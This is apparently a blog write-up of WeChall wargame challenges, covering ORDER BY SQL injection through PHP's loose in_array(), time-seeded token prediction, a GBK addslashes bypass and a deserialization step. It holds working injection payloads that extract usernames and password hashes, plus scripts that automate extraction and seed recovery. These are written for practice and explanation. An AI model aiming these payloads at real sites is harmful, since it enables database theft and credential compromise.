wechall writeup(1)

order by query PHP

Look at the key code:

if (!in_array($orderby, $whitelist)) {
    return htmlDisplayError('Error 1010101: Not in whitelist.');
}

$orderby = $db->escape($orderby);

// $orderby is interpolated into the query after the whitelist check. The escape
// does not help: an ORDER BY payload needs no quotes (hex literals stand in for strings).
$query = "SELECT * FROM users ORDER BY $orderby $dir LIMIT 10";

There is a PHP trick here:

$names = array(1 => 'Username', 3 => 'Apples', 4 => 'Bananas', 5 => 'Cherries');
$whitelist = array_keys($names);   // assumed: the allowed values are the numeric column keys
$orderby = '5 and 123';
var_dump(in_array($orderby, $whitelist));

The result is true (1): in_array() compares loosely by default, so the string '5 and 123' is converted to the integer 5 (its leading digits) before comparison and matches the whitelist entry 5. in_array($orderby, $whitelist, true) would have rejected it. PHP 8 changed int-vs-string comparison so that a non-numeric string such as '5 and 123' no longer equals 5; this bypass depends on PHP 7 or earlier.

Summary of ORDER BY injection: http://www.jinglingshu.org/?p=10105 Error-based injection: http://joychou.org/index.php/web/SQL-Injections-in-MySQL-LIMIT-clause.html

  • First confirm that injection is possible:

    http://www.wechall.net/challenge/order_by_query/index.php?by=3%20ASC%20--  

This returns all rows in ascending order: '3 ASC --' still passes the loose in_array() check, and the -- comments out the rest of the query ($dir and LIMIT 10).

  • Exploitation

Since the injection point is inside ORDER BY rather than a column list, union cannot be used to retrieve data, which leaves blind or error-based injection. Blind injection would have worked with

if(1<2,3,5)
if(1>2,3,5)

in the ORDER BY position (a true condition sorts by column 3, a false one by column 5, so the row order leaks one bit per request), but the challenge makes that awkward, so error-based injection, which returns the data directly in the error message, is more convenient here:

3 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) --

The count(*)/group by over floor(rand(0)*2) produces a duplicate group key, and MySQL's "Duplicate entry" error quotes the key, user() included.

Another, fancier error-based technique:

?by=3  PROCEDURE analyse(extractvalue(rand(),concat(0x3a,database())),1) --

extractvalue() raises an XPATH syntax error that echoes its malformed second argument, so the value we want appears in the error text. PROCEDURE ANALYSE() evaluates the expressions passed as its arguments, which makes it a carrier for such an expression in positions like after LIMIT (see the joychou article above); it was removed in MySQL 8.0, so this variant only works on 5.x. This gives the database name gizmore_as2. Then the usual routine:

?by=3  PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(select table_name  from information_schema.tables where table_schema=0x67697a6d6f72655f617332))),1) --

0x67697a6d6f72655f617332 is the hex encoding of the database name gizmore_as2; writing it as a hex literal avoids single quotes. The table name is users.

?by=3  PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(select column_name  from information_schema.columns where table_schema=0x67697a6d6f72655f617332 and table_name=0x7573657273 limit 1,1))),1) --

The column name is password. Finally, username and password:

http://www.wechall.net/challenge/order_by_query/index.php?by=3  PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(select concat(username,0x3a,password) from users limit 2,1))),1) --

GDO Error(1105): XPATH syntax error: ':Admin:3C3CBEB0C8ADC66F2922C65E7'

Note that the XPATH error message shows at most 32 characters (the leading ':' included), so the hash above is cut off after 25 hex digits; wrap the inner select in substr(..., 32, 31), substr(..., 63, 31) and so on to read the rest.
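The following Python, added here as an example and not part of the original write-up, automates that chunked read: it builds the same PROCEDURE analyse() payload around substr() windows, parses the leak out of a GDO Error line, and stitches the chunks together. The challenge page is replaced by a constructed stand-in (`fake_send`, answering from a made-up row) so the code runs offline; `build_by_param`, `parse_leak` and `extract_full` are names of my own.

```python
import re

# Added example (not from the original post): chunked error-based extraction.
# MySQL's "XPATH syntax error" echoes at most 32 characters of the bad XPath
# string. With a one-byte 0x3a separator in front, each request yields 31
# characters of data, so the secret is read through substr() windows of 31.

CHUNK = 31
LEAK_RE = re.compile(r"XPATH syntax error: '(.*?)'")


def build_by_param(expr, offset):
    """Value of the `by` parameter leaking one substr() window of `expr`.

    `expr` is a SQL select such as: select password from users limit 2,1
    The PROCEDURE analyse()/extractvalue() wrapper is the one used on the page.
    """
    inner = "substr(({expr}),{off},{n})".format(expr=expr, off=offset, n=CHUNK)
    return ("3 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,{inner})),1) --"
            .format(inner=inner))


def parse_leak(response_text):
    """Leaked string from a 'GDO Error(1105): XPATH syntax error' line,
    without the leading ':' separator; None when the response has no leak."""
    m = LEAK_RE.search(response_text)
    if not m:
        return None
    leaked = m.group(1)
    return leaked[1:] if leaked.startswith(":") else leaked


def extract_full(send, expr):
    """Read `expr` completely through `send(by_param) -> response text`."""
    result = ""
    offset = 1
    while True:
        chunk = parse_leak(send(build_by_param(expr, offset)))
        if not chunk:
            break
        result += chunk
        if len(chunk) < CHUNK:      # a short window means the value is exhausted
            break
        offset += CHUNK
    return result


# Constructed stand-in for the challenge endpoint: it evaluates the substr()
# window against a made-up row and returns MySQL's 32-character-truncated error.
FAKE_ROW = "Admin:3C3CBEB0C8ADC66F2922C65E70123456"
SUBSTR_RE = re.compile(r"substr\(\((.*)\),(\d+),(\d+)\)")


def fake_send(by_param):
    m = SUBSTR_RE.search(by_param)
    offset, length = int(m.group(2)), int(m.group(3))
    window = FAKE_ROW[offset - 1: offset - 1 + length]
    xpath = (":" + window)[:32]          # what extractvalue() echoes back
    return "GDO Error(1105): XPATH syntax error: '{}'".format(xpath)


if __name__ == "__main__":
    print(extract_full(fake_send,
                       "select concat(username,0x3a,password) from users limit 2,1"))
```

Against the real page, `send` would be a function that performs the GET with the session cookie and returns the response body; everything else stays the same.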

basic rewrite HTTP

The challenge simply asks you to set up your own web server, so I built one with Docker. A later challenge needs big-number addition, which is why the image installs phpseclib. Dockerfile:

FROM phpfpm:with_mysql

# Install phpseclib
RUN pear channel-discover phpseclib.sourceforge.net \
 && pear install phpseclib/Math_BigInteger

CMD ["php-fpm"]

docker-compose.yml:

phpfpm_db:
  build: ./web
  volumes:
    - ./web/webcode:/webcode
nginx_server:
  image: nginx:1.8
  links:
    - phpfpm_db:phpfpm_db
  volumes:
    - ./server/conf/default_server.conf:/etc/nginx/conf.d/default.conf
    - ./server/logs:/var/log/nginx
  volumes_from:
    - phpfpm_db
  ports:
    - "8088:80"

Write a script that makes wechall visit the server:

import requests

session = requests.Session()

def go():
    # Tell the challenge page which port our server listens on and ask it to check.
    post_data = {'port': '8088', 'go': 'I have set it up. Please check my server.'}
    #url = "http://www.wechall.net/challenge/training/www/basic/index.php"
    url = "http://www.wechall.net/challenge/training/www/rewrite/index.php"
    headers = {"Accept-Encoding": "gzip, deflate",
               "Accept-Language": "en-US,en;q=0.5",
               "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0",
               "Cookie": "WC=********",   # logged-in wechall session cookie (redacted)
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Connection": "keep-alive"}
    response = session.post(url, headers=headers, data=post_data)
    print(response.text)


if __name__ == '__main__':
    go()

reset to time PHP

This can be compared with the random challenge from 0ctf2016, which is harder; see
http://www.mscs.dal.ca/~selinger/random/ for background. This challenge seeds the generator with the time, so we only need to brute-force the time seed. Code:

<?php

function ttr_random($len, $alpha='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
{
    $alphalen = strlen($alpha) - 1;
    $key = '';
    for($i = 0; $i < $len; $i++)
    {
        $key .= $alpha[rand(0, $alphalen)];
    }
    return $key;
}


$csrf = "leqJygumb3PCOytrRRd4hUaGoQEcRhk2";   // the 32-character token the page handed out

//$time = mktime(09,03,04,04,18,2016);
$time = time()-500;   // the token was issued a moment ago; search forward from here
$tmp = "";
$i = 0;
for($i = 0;$i < 1000;$i++)
{
    srand($time + $i);
    $tmp = ttr_random(32);
    if($tmp == $csrf)
        break;
}
echo $tmp."\n";
echo $i."\n";

// The generator is now in the same state as the server's, so the next call
// yields the server's next token.
$token = ttr_random(16);
print $token."\n";

$res = "qJmSkxxx9rMZXO2I";
print $token == $res;

?>

Once the seed is found, the token generated afterwards follows directly (the last line prints 1 when the prediction matches). Run the search on the same PHP version as the target: PHP 7.1 turned rand()/srand() into aliases of mt_rand()/mt_srand(), so a seed found with one version's rand() does not reproduce the other's sequence.
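The same search in Python, added as an example (not the post's own code), with an explicit model of the generator the PHP above relies on. It assumes the target is PHP 5 on Linux (non-thread-safe build), where srand()/rand() wrap glibc's srandom()/random(), the additive feedback generator documented on Selinger's page linked above, and rand($min, $max) scales the raw value as min + (max - min + 1) * n / 2^31. The target seed 1460970184 and the search window are constructed for the demo; `glibc_random`, `php5_rand_range`, `ttr_random_stream` and `recover_seed` are my own names. The model does not apply to PHP 7.1+, where rand() is mt_rand().

```python
# Added example, not from the original post. Model of PHP 5's rand() on Linux:
# glibc random() (TYPE_3, degree 31, separation 3) plus PHP's RAND_RANGE scaling.

ALPHA = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
PHP_RAND_MAX = 2147483647


def glibc_random(seed, count):
    """First `count` outputs of glibc random() after srandom(seed).

    Valid for seeds below 2^31, which covers Unix timestamps until 2038.
    """
    if seed == 0:
        seed = 1                                  # glibc substitutes 1 for 0
    r = [0] * 34
    r[0] = seed
    for i in range(1, 31):                        # Park-Miller fill of the table
        r[i] = (16807 * r[i - 1]) % 2147483647
    for i in range(31, 34):
        r[i] = r[i - 31]
    out = []
    for i in range(34, 344 + count):              # the first 310 outputs are discarded
        r.append((r[i - 31] + r[i - 3]) & 0xFFFFFFFF)
        if i >= 344:
            out.append(r[i] >> 1)                 # glibc drops the low bit
    return out


def php5_rand_range(n, lo, hi):
    """PHP 5's RAND_RANGE macro: scale a raw random() value into [lo, hi]."""
    return lo + int((hi - lo + 1.0) * (n / (PHP_RAND_MAX + 1.0)))


def ttr_random_stream(seed, lengths):
    """ttr_random() called once per entry of `lengths`, right after srand(seed)."""
    raw = iter(glibc_random(seed, sum(lengths)))
    return ["".join(ALPHA[php5_rand_range(next(raw), 0, len(ALPHA) - 1)]
                    for _ in range(n)) for n in lengths]


def recover_seed(csrf, start, window=1000):
    """Seed in start..start+window whose first token equals `csrf`, or None."""
    for seed in range(start, start + window):
        if ttr_random_stream(seed, [len(csrf)])[0] == csrf:
            return seed
    return None


if __name__ == "__main__":
    # Constructed target: pretend the server seeded with this timestamp and
    # handed us the 32-character csrf; we want the 16-character token after it.
    true_seed = 1460970184
    csrf, token = ttr_random_stream(true_seed, [32, 16])
    found = recover_seed(csrf, true_seed - 500)
    print(found, ttr_random_stream(found, [32, 16])[1] == token)
```

`glibc_random(1, 3)` reproduces the familiar 1804289383, 846930886, 1681692777 that a C program gets from rand() with the default seed, which is a quick way to check the model before pointing it at a real token.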

addslashes

%bf%27 bypasses the addslashes function: addslashes() inserts a backslash (0x5c) before the quote, but when the connection charset is GBK the byte pair 0xbf 0x5c is read as one two-byte character, so the 0x27 that follows is a live single quote.
0x41646d696e represents 'Admin' as a hex literal, which avoids writing quotes at all.
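Why the %bf%27 trick works, as an added Python example rather than anything from the original post: a byte-level model of addslashes() followed by a GBK decode, assuming the application talks to MySQL with a GBK connection charset. `addslashes`, `quote_survives_gbk` and `from_url` are my own helper names.

```python
# Added example (not from the original post): the GBK wide-byte bypass of addslashes().
from urllib.parse import unquote_to_bytes


def addslashes(data):
    """Byte-for-byte model of PHP addslashes(): prefix ' " \\ and NUL with a backslash."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_survives_gbk(raw):
    """Escape `raw` as the server would, then read it back as GBK.

    Returns (decoded text, whether an unescaped single quote is left in it).
    """
    escaped = addslashes(raw)
    text = escaped.decode("gbk", errors="replace")
    # A quote directly preceded by a backslash is still escaped; any other
    # quote is live SQL syntax.
    live = any(c == "'" and (i == 0 or text[i - 1] != "\\")
               for i, c in enumerate(text))
    return text, live


def from_url(param):
    """Raw bytes PHP receives for a URL-encoded parameter such as %bf%27."""
    return unquote_to_bytes(param)


if __name__ == "__main__":
    for p in ["%27", "%bf%27"]:
        raw = from_url(p)
        print(p, addslashes(raw), quote_survives_gbk(raw))
```

For "%27" the decoded text is the two characters backslash and quote, so the quote stays escaped; for "%bf%27" the bytes bf 5c 27 decode to one CJK character followed by a bare quote. The fix on the server side is mysql_set_charset()/mysqli_real_escape_string() with a correctly declared charset, or prepared statements, not addslashes().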

are you serial

A simple deserialization problem; the following script generates the serialized object:

<?php
require_once('serial_user.php');        // the challenge's SERIAL_User class
require_once('serial_solution.php');    // the challenge's SERIAL_Solution class
$username = "admin";
$password = "admin";
$userlevel = 1;
$user = new SERIAL_User($username, $password, $userlevel);

$serial_user = serialize($user);
//echo $serial_user;

$solution = new SERIAL_Solution();
$serial_solution = serialize($solution);
echo $serial_solution;

?>

net ports

I found an interesting curl option: just add `--local-port 42`, which binds the client side of the connection to local port 42.

curl 'http://www.wechall.net/challenge/training/net/ports/index.php' --local-port 42 -H 'Accept-Encoding: gzip, deflate, sdch' -H 'Accept-Language: zh-CN,zh;q=0.8' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Referer: http://www.wechall.net/challs/HTTP/by/chall_score/ASC/page-1' -H 'Cookie: WC=***' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' --compressed

Binding a port below 1024 requires root (or CAP_NET_BIND_SERVICE on Linux), so run the command with sudo; if the port is still in TIME_WAIT from a previous attempt, the bind fails until it is released.
Author: angelwhu
Link: https://www.angelwhu.com/paper/2016/05/20/wechall-writeup1/
License: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. Please credit angelwhu_blog when reposting.